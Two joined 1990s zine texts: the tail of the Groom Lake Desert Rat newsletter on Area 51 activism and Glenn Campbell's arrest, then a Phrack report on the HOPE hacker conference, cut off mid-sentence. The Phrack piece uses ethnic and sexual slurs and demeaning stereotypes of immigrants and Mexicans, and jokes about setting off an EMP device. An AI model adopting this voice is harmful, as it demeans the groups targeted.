comfortable bed, then he blew a conk-shell horn and banged cymbals
|
|||
|
together to bless it. When the reporter arrived, he volunteered
|
|||
|
to make a bed for her, too, not far from his own, and he proceeded
|
|||
|
with the project without any encouragement. It is unknown why he
|
|||
|
singled her out for this special honor, but evidently she was
|
|||
|
"chosen." It should be noted, however, that while blessing the
|
|||
|
reporter's bed, the loony accidentally dropped one of the cymbals.
|
|||
|
We forget to check with the reporter in the morning to see if that
|
|||
|
omen affected the quality of her nighttime experience.
|
|||
|
|
|||
|
----- SOUND FAMILIAR? -----
|
|||
|
|
|||
|
From an AP news story printed in the 8/5 Review-Journal...
|
|||
|
|
|||
|
"PORT-AU-PRINCE, Haiti -- Authorities deported an American TV
|
|||
|
crew Thursday, putting the three journalists in an open pickup
|
|||
|
truck, parading them through the capital and then dumping them at
|
|||
|
the Dominican border....
|
|||
|
|
|||
|
"Soldiers detained the freelance journalists for PBS's 'The
|
|||
|
MacNeil/Lehrer Newshour' on Sunday while they were filming at
|
|||
|
Port-au-Prince's airport. Three of their videotapes were
|
|||
|
seized....
|
|||
|
|
|||
|
"The military-backed government has urged journalists not to
|
|||
|
report 'alarmist' news and has attempted to restrict news
|
|||
|
coverage....
|
|||
|
|
|||
|
"'I think it's deplorable, and it's obviously an attempt to
|
|||
|
embarrass them,' [U.S.] Embassy spokesman Stanley Schrager told
|
|||
|
The Associated Press. 'This treatment was not necessary; neither
|
|||
|
was the deportation.... It's a transparent attempt by this
|
|||
|
illegal regime to interfere with the free flow of information.'"
|
|||
|
|
|||
|
In related news, the four of the five video tapes seized on July
|
|||
|
19 from KNBC-TV have still not been returned. The tapes were
|
|||
|
taken without a warrant after the crew filmed an interview on
|
|||
|
Freedom Ridge but not the Groom base itself. Activist Glenn
|
|||
|
Campbell, who accompanied the crew, was arrested when he attempted
|
|||
|
to interfere with this seizure.
|
|||
|
|
|||
|
----- CAMPBELL ARRAIGNED -----
|
|||
|
|
|||
|
Activist Glenn Campbell reports that his Aug. 24 arraignment on
|
|||
|
obstruction charges was "amicable." Charges were presented, but
|
|||
|
the District Attorney did not appear. The complete text of the
|
|||
|
charges, stemming from the July 19 KNBC incident, reads as
|
|||
|
follows...
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
Case No. P55-94
|
|||
|
|
|||
|
IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP
|
|||
|
IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA
|
|||
|
|
|||
|
CRIMINAL COMPLAINT
|
|||
|
|
|||
|
STATE OF NEVADA, Plaintiff,
|
|||
|
vs.
|
|||
|
GLENN P. CAMPBELL, Defendant.
|
|||
|
|
|||
|
STATE OF NEVADA ) ss.
|
|||
|
County of Lincoln )
|
|||
|
|
|||
|
DOUG LAMOREAUX, being first duly sworn and under penalty of
|
|||
|
perjury, personally appeared before me and complained that on or
|
|||
|
about the 19th of July, 1994, in Lincoln County, State of Nevada,
|
|||
|
the above-named Defendant, GLENN P. CAMPBELL, committed the
|
|||
|
following crime:
|
|||
|
|
|||
|
COUNT 1
|
|||
|
|
|||
|
OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC
|
|||
|
1.12.010, a MISDEMEANOR, in the following manner:
|
|||
|
|
|||
|
The Defendant did, then and there, after due notice, willfully,
|
|||
|
hinder, delay or obstruct a public officer in the discharge of his
|
|||
|
officer powers or duties. Specifically, the Defendant did, then
|
|||
|
and there, after due notice, willfully hinder Sergeant Doug
|
|||
|
Lamoreaux in the discharge of his official duties by locking the
|
|||
|
doors of the vehicle which Sergeant Lamoreaux was retrieving
|
|||
|
certain items from and further refused to unlock the doors after
|
|||
|
being requested to do so by Sergeant Lamoreaux.
|
|||
|
|
|||
|
All of which is contrary to the form of Statute in such cases made
|
|||
|
and provided and against the peace and dignity of the State of
|
|||
|
Nevada. The complainant, therefore, prays that a Warrant be
|
|||
|
issued for the arrest of the Defendant, if not already arrested,
|
|||
|
so that he may be dealt with according to law.
|
|||
|
|
|||
|
[Signed]
|
|||
|
DOUG LAMOREAUX
|
|||
|
Sergeant
|
|||
|
Lincoln County Sheriff's Department
|
|||
|
|
|||
|
SUBSCRIBED and SWORN to before me
|
|||
|
this 24th day of August, 1994
|
|||
|
[Signed] NOLA HOLTON
|
|||
|
NOTARY PUBLIC/JUSTICE OF THE PEACE
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
The only surprise in these charges is the line "and further
|
|||
|
refused to unlock the doors after being requested to do so by
|
|||
|
Sergeant Lamoreaux." That is not how Campbell recalls the
|
|||
|
incident. DR#12, published less than 12 hours after the incident,
|
|||
|
reported it as follows...
|
|||
|
|
|||
|
"At this point Campbell, who had been standing on the opposite
|
|||
|
side of the vehicle, reached in and pushed down the door locks on
|
|||
|
the side that Lamoreaux was approaching.
|
|||
|
|
|||
|
"Lamoreaux said, 'You're under arrest.' Campbell was
|
|||
|
immediately handcuffed and placed in Deputy Bryant's vehicle."
|
|||
|
|
|||
|
Campbell claims that Lamoreaux said, "You're under arrest,"
|
|||
|
IMMEDIATELY after he pushed down the door locks, with no request
|
|||
|
being made to unlock them. Campbell says he has two other
|
|||
|
witnesses, the KNBC crew, who can verify his story. In this case,
|
|||
|
where the basic recollection of facts is in conflict, it will be
|
|||
|
interesting to see what the second officer, Deputy Kelly Bryant,
|
|||
|
will say under oath.
|
|||
|
|
|||
|
However, the core of Campbell's defense rests on Constitutional
|
|||
|
issues. He is guilty of obstruction only if the officer was
|
|||
|
indeed engaged in the "lawful" execution of his duties. Lamoreaux
|
|||
|
justified his warrantless search by citing, in vague terms, a
|
|||
|
certain Supreme Court ruling, the name of which he could not
|
|||
|
recall at the time. That ruling is apparently in the case "Ross
|
|||
|
vs. U.S." which allows the warrantless seizure of "contraband"
|
|||
|
from a vehicle when there is a danger of flight. It is unclear at
|
|||
|
this point whether the video tapes of a news crew constitute
|
|||
|
contraband in the same manner as a shipment of marijuana or stolen
|
|||
|
merchandise. Complex First Amendment issues may be invoked. The
|
|||
|
case may be further complicated by the repeated offer by the TV
|
|||
|
reporter to allow Lamoreaux to view the video tapes himself.
|
|||
|
|
|||
|
Campbell has requested, and has been granted, a jury trial.
|
|||
|
According to the Justice, this will be the first jury trial held
|
|||
|
in this court since about 1987. Campbell announced his intention
|
|||
|
to represent himself at the trial, with possible legal co-council.
|
|||
|
A tentative trial date of Oct. 25 has been set, but it is likely
|
|||
|
to be postponed. Campbell indicated that he will waive his right
|
|||
|
to a trial within 60 days to allow more time to conduct legal
|
|||
|
research.
|
|||
|
|
|||
|
----- LARRY KING NOT CLONED? -----
|
|||
|
|
|||
|
Our report in DR#13 about the diversion of Larry King's plane to
|
|||
|
Nellis AFB continues to disturb many of our readers. It raises
|
|||
|
the specter of secret contacts between King and the military or
|
|||
|
even a surreptitious replacement of the talk show host by a look-
|
|||
|
alike clone. Now, we wonder if our panic was only a false alarm.
|
|||
|
|
|||
|
A producer from a Las Vegas TV station tells us: "I checked into
|
|||
|
it and think it is legit. According to the FAA, McCarran Airport
|
|||
|
was never really closed, but they did have pilots choose not to
|
|||
|
land on that Saturday afternoon because of inclement weather.
|
|||
|
They also confirm that there is an agreement with Nellis to allow
|
|||
|
planes in trouble to land there. I spoke to the control tower at
|
|||
|
McCarran. They checked their records, and they indicate that on
|
|||
|
that Saturday a nasty thunderstorm was noted by the tower at 1:45-
|
|||
|
2:05. In fact, four takeoffs were delayed during that time due to
|
|||
|
weather. Planes in the air just flew holding patterns until the
|
|||
|
weather cleared."
|
|||
|
|
|||
|
Presumably, King's plane didn't have enough fuel to maintain the
|
|||
|
holding pattern. Thunderstorms can be very localized, and perhaps
|
|||
|
Nellis was clear. A producer at Larry King Live says that, in her
|
|||
|
opinion, he is definitely the same Larry King. She says he got
|
|||
|
the military escort because he was late for a speaking engagement
|
|||
|
and made his wants known on the plane.
|
|||
|
|
|||
|
So what can we say? Obviously, the FAA, the TV station and the
|
|||
|
King producer ARE PARTIES TO THE CONSPIRACY. This story is deeper
|
|||
|
than it seems, and the Rat will pursue the investigation for as
|
|||
|
long as it takes. THE TRUTH IS OUT THERE.
|
|||
|
|
|||
|
----- MYSTERIOUS SIGN DISAPPEARANCE -----
|
|||
|
|
|||
|
The big "No Photography" signs on the Groom Lake Road have
|
|||
|
disappeared. For over a year, they were installed on public land
|
|||
|
about two miles from the military border, but sometime in the
|
|||
|
first week of August they were cleanly removed, posts and all,
|
|||
|
apparently by the Air Force. (A civilian thief--like SDM, who has
|
|||
|
a number of these signs in his possession--would have simply
|
|||
|
unscrewed the signs, not uprooted the heavy posts and carefully
|
|||
|
filled up the holes.) The two signs on either side of the road
|
|||
|
were each about 3 feet by 4 feet and bore the following text:
|
|||
|
|
|||
|
WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.
|
|||
|
IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE,
|
|||
|
DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR
|
|||
|
FLYING OVER THIS INSTALLATION. IT IS UNLAWFUL TO REPRODUCE,
|
|||
|
PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH,
|
|||
|
PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR
|
|||
|
EQUIPMENT AT OR FLYING OVER THIS INSTALLATION. VIOLATION OF
|
|||
|
EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR
|
|||
|
IMPRISONMENT FOR UP TO ONE YEAR. 18 U.S. CODE SEC. 795/797 AND
|
|||
|
EXECUTIVE ORDER 10104. FOR INFORMATION CONTACT:
|
|||
|
USAF/DOE LIAISON OFFICE
|
|||
|
PO BOX 98518
|
|||
|
LAS VEGAS, NV 89193-8518
|
|||
|
|
|||
|
The signs first appeared in May 1993 shortly after WFAA-TV from
|
|||
|
Dallas took video of the base from White Sides. (When challenged
|
|||
|
by the Sheriff, they admitted photographing the base but managed
|
|||
|
to retain their tape.) The signs were removed in Aug. 1994
|
|||
|
shortly after KNBC-TV from Los Angeles lost their video tape after
|
|||
|
NOT photographing the base. It is unclear why the AF removed the
|
|||
|
signs. Perhaps they have become a little smarter and are adopting
|
|||
|
a "don't ask, don't tell" policy toward photography (but we
|
|||
|
wouldn't want to be the ones to test that theory). The signs
|
|||
|
themselves had become a tourist attraction, and no visitor could
|
|||
|
resist having their picture taken beside them.
|
|||
|
|
|||
|
At the same time the "No Photography" signs vanished, the
|
|||
|
misplaced "Restricted Area" sign also went away. This is the
|
|||
|
crossed out sign seen in the NYT article, where the "stupid
|
|||
|
faggot" comment had later been written and then erased (DR#12,13).
|
|||
|
God, we'll miss that sign! It was as illegal as hell--being on
|
|||
|
public land--but an old friend to us nonetheless.
|
|||
|
|
|||
|
At least now we can assure the public: If you see a Restricted
|
|||
|
Area sign, it's real and they mean it.
|
|||
|
|
|||
|
----- INTEL BITTIES -----
|
|||
|
|
|||
|
ENCOUNTERS TRANSCRIPT. Complete, unedited transcripts (not just
|
|||
|
the sound bites) of the interviews in the 7/22 Encounters show
|
|||
|
(DR#10) are available to Compuserve users. Type GO ENCOUNTERS,
|
|||
|
and look under "Browse Libraries" and "Interview Transcripts."
|
|||
|
Interviews include Rep. James Bilbray (file FREED2.105), Agent X
|
|||
|
(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105). This
|
|||
|
is a transcript for video editing, so every "Um" and "Ah" is
|
|||
|
recorded.
|
|||
|
|
|||
|
NEW GUARD FACILITY. We send our congrats to the Dudes on their
|
|||
|
newly constructed prefab building next to the guard house on Groom
|
|||
|
Lake Road (about a half mile inside the border). Apparently, they
|
|||
|
are expecting more business along this part of the border and need
|
|||
|
a new substation. Interested taxpayers can view the new building
|
|||
|
from the first hill on the hiking trail to F.R. ("Hawkeye Hill"),
|
|||
|
a location that will continue to be public even if F.R. is taken.
|
|||
|
|
|||
|
UPCOMING TV SEGMENTS. UNSOLVED MYSTERIES will broadcast a show on
|
|||
|
UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm. The
|
|||
|
broadcast will include a new interview with Bob Lazar. THE
|
|||
|
CRUSADERS will broadcast a segment on UFOs, including a visit to
|
|||
|
F.R., on Sept. 10 or 11 (date and time vary by city). Air date
|
|||
|
for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been
|
|||
|
confirmed, but it could be the week of Sept. 12.
|
|||
|
|
|||
|
===== SUBSCRIPTION AND COPYRIGHT INFO =====
|
|||
|
|
|||
|
(c) Glenn Campbell, 1994. (psychospy@aol.com)
|
|||
|
|
|||
|
This newsletter is copyrighted and may not be reproduced without
|
|||
|
permission. PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING: For
|
|||
|
one year following the date of publication, you may photocopy this
|
|||
|
text or send or post this document electronically to anyone who
|
|||
|
you think might be interested, provided you do it without charge.
|
|||
|
You may only copy or send this document in unaltered form and in
|
|||
|
its entirety, not as partial excerpts (except brief quotes for
|
|||
|
review purposes). After one year, no further reproduction of this
|
|||
|
document is allowed without permission.
|
|||
|
|
|||
|
Email subscriptions to this newsletter are available free of
|
|||
|
charge. To subscribe (or unsubscribe), send a message to
|
|||
|
psychospy@aol.com. Subscriptions are also available by regular
|
|||
|
mail for $15 per 10 issues, postpaid to anywhere in the world.
|
|||
|
|
|||
|
A catalog that includes the "Area 51 Viewer's Guide", the Groom
|
|||
|
Lake patch and hat and many related publications is available upon
|
|||
|
request by email or regular mail.
|
|||
|
|
|||
|
Back issues are available on various bulletin boards and by
|
|||
|
internet FTP to ftp.shell.portal.com, directory
|
|||
|
/pub/trader/secrecy/psychospy. Also available by WWW to
|
|||
|
http://alfred1.u.washington.edu:8080/~roland/rat/desert_rat_index.
|
|||
|
html
|
|||
|
|
|||
|
Current circulation: 1440 copies sent directly to subscribers
|
|||
|
(plus an unknown number of postings and redistributions).
|
|||
|
|
|||
|
The mail address for Psychospy, Glenn Campbell, Secrecy Oversight
|
|||
|
Council, Area 51 Research Center, Groom Lake Desert Rat and
|
|||
|
countless other ephemeral entities is:
|
|||
|
HCR Box 38
|
|||
|
Rachel, NV 89001 USA
|
|||
|
|
|||
|
###
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 22 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
HOPE
|
|||
|
by
|
|||
|
Erik Bloodaxe
|
|||
|
|
|||
|
I was a little apprehensive about going to HOPE. I'd been warned for months
|
|||
|
that "If you go to HOPE, you are going home in a body bag," and "I am
|
|||
|
going to kick your fucking ass at hope," and "If you go, you're gonna get
|
|||
|
shot."
|
|||
|
|
|||
|
Needless to say I found this a bit unnerving. As big an ego as I may have,
|
|||
|
it still does not repel hot lead projectiles. Add this to the fact that my
|
|||
|
best friend of 10 years was murdered by some random idiot with a pistol in
|
|||
|
fucking pissant, Bible-thumping Waco, TX a few months back. Waco. And the
|
|||
|
shooter wasn't even a Davidian, just a drugged-out 16 year-old. If the
|
|||
|
kids pack heat in Waco, I know they must come standard issue in New York.
|
|||
|
|
|||
|
But, hell, I've haven't missed a con in ages. Could I actually miss
|
|||
|
a SummerCon? Especially the SummerCon commemorating the 10th
|
|||
|
anniversary of 2600 Magazine? Could I?
|
|||
|
|
|||
|
Like an idiot, I make my reservations. Ice-9, who was stuck with a
|
|||
|
leftover ticket on United, traded it in and we were both off to New York.
|
|||
|
|
|||
|
We arrived late Friday night. So there we were: The Big Apple, Metropolis,
|
|||
|
The City that Never Sleeps. Unfortunately, it never showers or changes
|
|||
|
its clothes either. Why anyone in their right mind would want to come
|
|||
|
to New York City boggles the mind. It sucks. I mean, I've been damn
|
|||
|
near everywhere in the United States, I've been to major cities in Mexico,
|
|||
|
Canada and Europe, and New York is by far and away the worst fucking
|
|||
|
shithole I've seen yet. I don't know for certain, but Port au Prince
|
|||
|
probably has more redeeming qualities.
|
|||
|
|
|||
|
I figured out within a few minutes why New Yorkers are such assholes too.
|
|||
|
First, no one seems to be from New York exactly, merely transplants from
|
|||
|
somewhere else. So what has happened is that they bought into New York's
|
|||
|
superb public relations campaign and sold off all their belongings to get
|
|||
|
their ticket to America and the land of opportunities. So, they find
|
|||
|
themselves in NYC with about half a billion other broke, disillusioned
|
|||
|
immigrants wading in their own filth, growing very pissed off at being sold
|
|||
|
such a bill of goods.
|
|||
|
|
|||
|
It would piss me off too. And I'm sure our cab driver that night missed his
|
|||
|
family's ancestral thatched hut back in good old Bangladesh. But luckily for
|
|||
|
him crack provides a good short-term solution. Not to mention excellent
|
|||
|
motor skills.
|
|||
|
|
|||
|
Twenty-five near misses, and a lengthy carhorn symphony later, we managed to
|
|||
|
arrive at the Hotel Pennsylvania intact. The hotel, heralded in legend and
|
|||
|
lore had seen better decades. About the only thing it had going for it was
|
|||
|
one of the oldest phone numbers in the city. PEnnsylvania 6-5000.
|
|||
|
(Ta-da-dum-dum) I think if Glen Miller were alive today, his band members
|
|||
|
would kick his ass if he told them they had to sleep there.
|
|||
|
|
|||
|
For a hundred dollars a night, Ice-9 and I were treated to two less than
|
|||
|
jail-house sized beds, a tv that almost worked, and a hardwired telephone
|
|||
|
(ie: no modular jacks in sight.) In addition, the entire room was stained
|
|||
|
from floor to ceiling, and most of the wall paper by the window had peeled
|
|||
|
halfway down. The window itself opened to a miraculous view of the trash
|
|||
|
12 floors down. We debated on throwing every single object in the room
|
|||
|
out the window for a little excitement, but decided it might injure some of
|
|||
|
the homeless below.
|
|||
|
|
|||
|
Anxious to get the hell out of our little cell (well, the prisons I've had
|
|||
|
the misfortune to sleep in were in better repair) Ice-9 and I took off to
|
|||
|
the top floor and the HOPE conference area.
|
|||
|
|
|||
|
I don't know why Emmanuel decided to call this conference "Hackers On Planet
|
|||
|
Earth." This conference had more right to the title "Hacking at the End
|
|||
|
of the Universe." Perhaps even "Hacking in the Cesspool of the Earth."
|
|||
|
HEU was in the middle of nowhere, but it was pretty and happy. It should have
|
|||
|
been called HOPE.
|
|||
|
|
|||
|
In fact, as the days went on, I noticed a number of similarities between
|
|||
|
HOPE and HEU:
|
|||
|
|
|||
|
1. Both heavily orchestrated by 2600 and Hack-Tic
|
|||
|
2. Both had in-house networks
|
|||
|
3. Both had token "fed" speakers
|
|||
|
4. Both had seminars on boxing, pagers, social engineering, history,
|
|||
|
UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
|
|||
|
5. Both drew extensive press attendees
|
|||
|
6. Both charged more than any other conferences. (HOPE 25, HEU 50)
|
|||
|
7. Both had over a thousand attendees
|
|||
|
8. Both used computer equipment to make photo badges
|
|||
|
9. Both tried far too hard to be technical
|
|||
|
10. New York used to be New Amsterdam
|
|||
|
|
|||
|
But I digress...
|
|||
|
|
|||
|
Anyway, the network room was beginning to shape up quite nicely. Young
|
|||
|
hacklets were already clicking away at their keyboards, oblivious to
|
|||
|
anything else save their screens. Why anyone would travel all the way to
|
|||
|
New York to sit in front of a screen and type all by their lonesome
|
|||
|
left me stymied. Isn't that what we all do back at home?
|
|||
|
|
|||
|
The first people we ran into were Winn Schwartau and Bootleg. I could
|
|||
|
be wrong, but I think a large factor in Winn's showing up at HOPE was
|
|||
|
to watch me get shot and write about it. He told me his article would
|
|||
|
be titled, "Cyber-Christ gets nailed to the Cross." Bootleg, however, was
|
|||
|
here to raise a little hell. And goddamnit, so were we!
|
|||
|
|
|||
|
Hacker conferences have always been an excuse for people who only knew
|
|||
|
each other over the phone and over the networks to actually meet face to
|
|||
|
face and hang out. Anyone who tells you "Conferences today suck, there isn't
|
|||
|
enough technical inpho," is a clueless fuck. You do not go to a conference
|
|||
|
expecting to learn anything. If you don't already know, chances are pretty
|
|||
|
damn good that the people who do won't tell you. You learn by doing, not by
|
|||
|
sitting in an audience at some hacker con. Get a beer, make some new friends,
|
|||
|
and THEN maybe you might pick up something in casual conversation, but at
|
|||
|
least you will have a good time getting sloshed with new people who share
|
|||
|
common interests. The only people who will learn something from
|
|||
|
hacker conferences are journalists who will then go on to write even
|
|||
|
more scathing sensationalist pieces about how hackers will destroy
|
|||
|
your credit and eavesdrop on your phone. Is that what we really
|
|||
|
want?
|
|||
|
|
|||
|
Me, Ice-9, Bootleg, Bootleg's friend from Oregon, and Thomas Icom took off
|
|||
|
to drink and see what debauchery lay waiting for us in Times Square.
|
|||
|
(Yes, it was a very, very, very mismatched looking group.) Icom, armed
|
|||
|
with ever-present handheld scanner, kept a continual broadcast of NYPD's
|
|||
|
latest exploits.
|
|||
|
|
|||
|
We ended up hanging out on the fringes of Times Square at some sidewalk
|
|||
|
deli bullshitting about anything and everything. A recurring topic throughout
|
|||
|
the whole weekend was EMP and HERF weaponry. I don't particularly know
|
|||
|
if anyone in the underground would more excited by setting off one of these
|
|||
|
devices, or merely being able to brag to everyone that they were in possession
|
|||
|
of one.
|
|||
|
|
|||
|
We sat talking about the ramifications of setting off some such device on
|
|||
|
the roof of the building we were sitting in front of. The thought of
|
|||
|
all the neon and electronics surrounding us simultaneously ceasing to
|
|||
|
function and imploding at the logic gate level provided for at least an
|
|||
|
hour of hacker masturbation material. Bootleg reminisced about trying to
|
|||
|
track down decommissioned military radar equipment back in the early 80's
|
|||
|
for just such a project. "I'm surprised it's taken this long for the
|
|||
|
underground to get up on this stuff," he said.
|
|||
|
|
|||
|
As we headed back to the hotel, we passed by the coolest vehicle ever
|
|||
|
seen by hacker eyes. The 2600 van was an exact replica of a NYNEX
|
|||
|
van, with the subtle addition of the magazines moniker instead of
|
|||
|
NYNEX, and a ball-capped hack-type tapping away on a notebook computer,
|
|||
|
plugged into the bell logo. It was truly a sight to behold. I began
|
|||
|
to drool. All Phrack has is a beat up, red Toyota Corolla.
|
|||
|
|
|||
|
Up in the network room those that were not deeply engrossed in hacking
|
|||
|
the hope.net linux box were either already plowed (Hi Torquie!) or about
|
|||
|
to be.
|
|||
|
|
|||
|
It was late, so we decided to crash.
|
|||
|
|
|||
|
Ice-9 and I managed to wake up at a reasonable hour, and took off to
|
|||
|
see the city. I had seen an electronics store the night before, and
|
|||
|
had been looking for a PAL-NTSC-SECAM VCR for ages. I found it.
|
|||
|
New York's only saving grace (well, except the huge amount of
|
|||
|
businesses there all screaming for security work) was cheap consumer
|
|||
|
electronics. For 380 bucks I got a VCR that not only converted on the
|
|||
|
fly between any tape format, but also had a digital freeze frame
|
|||
|
for those elusive screen captures. I was stoked.
|
|||
|
|
|||
|
After some food, we headed back up to the conference. The buzz was
|
|||
|
someone had several hundred cell phones confiscated by Cellular One
|
|||
|
reps after he off-handedly remarked that he would clone them
|
|||
|
to a potential buyer. I then ran into two of my friends from WAY back
|
|||
|
in the early 80's: Tuc and Agrajag. Ag is an amazing guy. Not only
|
|||
|
was he fantastic way back then, he went on to write UNIX for Commodore,
|
|||
|
pull stints at places like USL, and is now working with speech
|
|||
|
recognition and wireless networking. Yet another fine example of
|
|||
|
those ne'er-do-well Legion of Doom guys the government always
|
|||
|
frowned upon. Right.
|
|||
|
|
|||
|
Later that afternoon, as I'm talking to someone in the network room, I feel
|
|||
|
someone bump into me. "Oh, sorry," says the person, and I go on with my
|
|||
|
conversation. A few seconds later, it happens again. Same guy, same
|
|||
|
"Oh, sorry." When it happens a third time I shove the guy back, and
|
|||
|
say, "Man, what the hell is your problem." Mistake. I look up straight
|
|||
|
into the eyes of a guy about 7 feet tall and 2 feet wide. Well, I'm
|
|||
|
exaggerating but it sure seemed that way at the time. All of a sudden
|
|||
|
I am an extra in the Puerto Rican version of "Of Mice and Men."
|
|||
|
"De Ratones Y Hombres"
|
|||
|
|
|||
|
The first guy was about 5 feet tall, and scurried around within an arms
|
|||
|
reach of the big guy. Immediately I realize that if I do ANYTHING, this
|
|||
|
big dude is more than ready to fuck me up, so the little guy must be a
|
|||
|
diversion. The big guy grunts and begins to maneuver around me.
|
|||
|
The little guy then takes his cue and begins pushing me, all the while
|
|||
|
asking "What's your name? What's your handle?" I keep backing up keeping
|
|||
|
an eye on the big guy, who is staring daggers at me. Well, at least with
|
|||
|
his one good eye. His lazy eye, stared daggers at the wall, the carpet,
|
|||
|
and a few other places.
|
|||
|
|
|||
|
Meanwhile, this little event has gathered the interest of many in the con.
|
|||
|
People began to gather around to see Erik Bloodaxe finally get beat down.
|
|||
|
Unfortunately for the would-be spectators, several others tried to intervene.
|
|||
|
Tuc and a few of the other larger attendees went up to the big guy and
|
|||
|
attempted to hold him back. This only succeeded in him letting out a
|
|||
|
roar-like sound as he shrugged them off and continued coming towards me.
|
|||
|
|
|||
|
Finally, I say to the little guy, who has been engaging me in what was
|
|||
|
basically the equivalent of the mosh pit at a Barry Manilow concert,
|
|||
|
(One fucked up guy running into people who don't want to play his game)
|
|||
|
"I'm Chris Goggans, who the hell are you?" To which he yells, "I'M JULIO!"
|
|||
|
|
|||
|
Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was
|
|||
|
raided by the FBI and Secret Service some years back. While all
|
|||
|
his MOD brethren served jail time, Julio worked out a deal with the
|
|||
|
prosecutors in which he sold out his friends by agreeing to provide
|
|||
|
state's evidence against them should the cases go to court.
|
|||
|
|
|||
|
And I'm the bad guy?
|
|||
|
|
|||
|
Fuck, all I ever did was try to keep my business running free of
|
|||
|
interruptions from disgruntled, jealous teenagers. I never turned state's
|
|||
|
evidence against my best friends to save my own ass. What am I, Agent Steal?
|
|||
|
|
|||
|
At this point everyone rushed in-between us and whisked Julio and his
|
|||
|
lazy-eyed, neandrethal boyfriend out the door. (Notice, I can call him
|
|||
|
all kinds of names now, because I'm back home in Austin, several thousand
|
|||
|
miles away.) I still have no idea who the big guy was.
|
|||
|
|
|||
|
From now on, those of you who sincerely want to kick my ass, have the
|
|||
|
nerve to do it by yourself. I mean, I only went as far up as green in
|
|||
|
Tae Kwan Do, but that was far enough to learn the sacred truth, "Never
|
|||
|
take on more than ONE person or you will get the shit kicked out of you."
|
|||
|
Leave your boyfriends at home and be a man. If I have the balls to
|
|||
|
go thousands of miles away from home an enter the DMZ expecting to get
|
|||
|
shot, then you should have the balls enough to do something on your own.
|
|||
|
And remember: take the first swing.
|
|||
|
|
|||
|
Shortly after "the incident" as it came to be called, by everyone who
|
|||
|
approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele
|
|||
|
took off to find food. Steele decided we needed female accompaniment,
|
|||
|
so he invited a reporter from Details. She brought along her camera crew,
|
|||
|
who had been taking so many pictures around the con, one would think
|
|||
|
they owned Polaroid stock.
|
|||
|
|
|||
|
Robert Steele is an interesting character. After a 20 year CIA tour he went
|
|||
|
on to found Open Source Solutions, a beltway operation that uses public
|
|||
|
sources of information to build intelligence dossiers. He described
|
|||
|
himself as "a short, fat, balding old-guy." This is like Rush Limbaugh
|
|||
|
calling himself "a harmless, loveable little fuzzball." Their self-image
|
|||
|
is a bit removed from reality. Steele carries himself with the air of
|
|||
|
a spy. It's kind of hard to explain, but it would be easy to see Steele
|
|||
|
excusing himself from dinner, killing three guys in the alley, and coming
|
|||
|
back for a piece of apple pie without an accelerated heartbeat or breaking
|
|||
|
a sweat.
|
|||
|
|
|||
|
On top of being so immersed in the spy game, and having been in charge of
|
|||
|
the design and implementation of the CIA's data center, Steele takes the
|
|||
|
severely radical viewpoint that hackers are America's most valuable
|
|||
|
resource, and should be put to productive use rather than jailed. This
|
|||
|
man needs to come to more cons.
|
|||
|
|
|||
|
Dinner was odd to say the least. The media people sat together, somewhat
|
|||
|
removed from us. They said approximately 5 words to us the whole time,
|
|||
|
possibly feeling somewhat bored by our drunken computer revelry.
|
|||
|
The reporter seemed visibly disturbed by all of us, and the guys
|
|||
|
looked like they would be more comfortable sitting in a coffee shop
|
|||
|
listening to Tom Waits while having a hearty debate over "Freud vs. Jung."
|
|||
|
|
|||
|
Our discussions got louder and louder as the scotch flowed, and
|
|||
|
by the end of the evening most of the restaurant had heard such topics
|
|||
|
as "The CIA does most of its recruitment in the Mormon church," and
|
|||
|
"licking the floor at a Times Square peep show." By the time the check
|
|||
|
came the Details people were more than happy to pay more than their share
|
|||
|
of the bill to get the hell out of Dodge. A word of advice: always
|
|||
|
get separate checks when dining out with any of us.
|
|||
|
|
|||
|
Back in the hood, everyone was milling about waiting for the
|
|||
|
History of 2600 panel to begin. There was some kind of problem with
|
|||
|
one of the displays, so people were beginning to grow restless. Right
|
|||
|
about then one of the best looking girls at the con wandered by. Taking
|
|||
|
a guess, I asked her, "Are you Morgen?" She was. It's almost unbelievable
|
|||
|
that someone who would waste time hanging out on IRC and who can actually
|
|||
|
interview for highly technical jobs could look like this.
|
|||
|
|
|||
|
Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to
|
|||
|
get drunk, all of them rather disgusted by the regular con attendees.
|
|||
|
They invited me, so I tracked down Ice-9, who by that time was so ready
|
|||
|
for a pint of Guiness you could almost see the Harp Logo showing up
|
|||
|
on his skin like drunken stigmata.
|
|||
|
|
|||
|
We ended up across the street at a little pub called the Blarney Rock.
|
|||
|
Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots
|
|||
|
went down like Mexican whores. Everyone was in agreement that this
|
|||
|
was the best time any of us had experienced at HOPE. In between everyone
|
|||
|
drinking, and leering at Morgen, we actually talked about hacking stuff too.
|
|||
|
Gee, and we weren't even on a panel!
|
|||
|
|
|||
|
As the night progressed, almost everyone from the con ended up at the Blarney
|
|||
|
Rock. The con took the place over. The Blarney Rock probably made
|
|||
|
more money that night than they had any night in recent history.
|
|||
|
Everyone actually mingled, talked, planned and plotted. Plans were thrown
|
|||
|
around for the next PumpCon (Boston?), everyone talked about "the time
|
|||
|
they were busted the first time," Steele showed up wearing a Chinese
|
|||
|
Communist Cap, Fusion cursed at passers by in Korean and almost started
|
|||
|
